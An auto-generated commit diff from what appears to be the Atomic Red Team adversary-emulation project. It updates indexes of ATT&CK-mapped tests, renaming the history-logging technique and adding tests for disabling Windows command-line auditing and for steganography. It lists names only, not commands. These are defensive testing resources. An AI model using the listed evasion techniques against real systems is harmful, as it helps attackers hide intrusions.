Generated docs from job=generate-docs branch=master [ci skip]

2024-03-06 19:35:27 +00:00
parent dd87338bc0
commit 2d82fc9563
29 changed files with 817 additions and 70 deletions
@@ -388,16 +388,18 @@ defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,11,Disable Windows Command Line Auditing using reg.exe,1329d5ab-e10e-4e5e-93d1-4d907eb656e5,command_prompt
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,12,Disable Windows Command Line Auditing using Powershell Cmdlet,95f5c72f-6dfe-45f3-a8c1-d8faa07176fa,command_prompt
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
@@ -1277,6 +1279,8 @@ command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript
 command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
+command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
+command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -97,16 +97,16 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configur
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
 defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,1,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,062f92c9-28b1-4391-a5f8-9d8ca6852091,powershell
 defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,2,ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI,14d55b96-b2f5-428d-8fed-49dc4d9dd616,command_prompt
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
@@ -57,8 +57,8 @@ defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5
 defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
@@ -266,6 +266,8 @@ defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,11,Disable Windows Command Line Auditing using reg.exe,1329d5ab-e10e-4e5e-93d1-4d907eb656e5,command_prompt
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,12,Disable Windows Command Line Auditing using Powershell Cmdlet,95f5c72f-6dfe-45f3-a8c1-d8faa07176fa,command_prompt
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
@@ -856,6 +858,8 @@ command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05
 command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
+command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
+command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
@@ -497,7 +497,7 @@
  - Atomic Test #2: Create Hidden User using IsHidden option [macos]
  - Atomic Test #3: Create Hidden User in Registry [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
  - Atomic Test #1: Disable history collection [linux, macos]
  - Atomic Test #2: Disable history collection (freebsd) [linux]
  - Atomic Test #3: Mac HISTCONTROL [macos, linux]
@@ -508,6 +508,8 @@
  - Atomic Test #8: Setting the HISTFILE environment variable [linux]
  - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
  - Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
+  - Atomic Test #11: Disable Windows Command Line Auditing using reg.exe [windows]
+  - Atomic Test #12: Disable Windows Command Line Auditing using Powershell Cmdlet [windows]
 - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -1767,7 +1769,9 @@
  - Atomic Test #27: Linux Download File and Run [linux]
  - Atomic Test #28: Nimgrab - Transfer Files [windows]
  - Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
+  - Atomic Test #1: Steganographic Tarball Embedding [windows]
+  - Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage [windows]
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [linux, macos]
@@ -146,7 +146,7 @@
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
  - Atomic Test #1: Disable history collection [linux, macos]
  - Atomic Test #2: Disable history collection (freebsd) [linux]
  - Atomic Test #3: Mac HISTCONTROL [macos, linux]
@@ -365,7 +365,7 @@
  - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
  - Atomic Test #14: whois file download [linux, macos]
  - Atomic Test #27: Linux Download File and Run [linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [linux, macos]
@@ -108,7 +108,7 @@
 - [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
  - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
  - Atomic Test #2: Create Hidden User using IsHidden option [macos]
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
  - Atomic Test #1: Disable history collection [linux, macos]
  - Atomic Test #3: Mac HISTCONTROL [macos, linux]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -300,7 +300,7 @@
  - Atomic Test #5: sftp remote file copy (push) [linux, macos]
  - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
  - Atomic Test #14: whois file download [linux, macos]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [linux, macos]
@@ -352,7 +352,9 @@
 - [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
  - Atomic Test #3: Create Hidden User in Registry [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.003 Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
+  - Atomic Test #11: Disable Windows Command Line Auditing using reg.exe [windows]
+  - Atomic Test #12: Disable Windows Command Line Auditing using Powershell Cmdlet [windows]
 - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -1228,7 +1230,9 @@
  - Atomic Test #26: Download a file using wscript [windows]
  - Atomic Test #28: Nimgrab - Transfer Files [windows]
  - Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
+  - Atomic Test #1: Steganographic Tarball Embedding [windows]
+  - Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage [windows]
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #3: portproxy reg key [windows]
@@ -36,7 +36,7 @@
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) |  | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -49,7 +49,7 @@
 |  |  |  |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
+|  |  |  |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) |  |  |  |  |  |  |  |
@@ -36,7 +36,7 @@
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -51,7 +51,7 @@
 |  |  |  |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
-|  |  |  |  | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
+|  |  |  |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
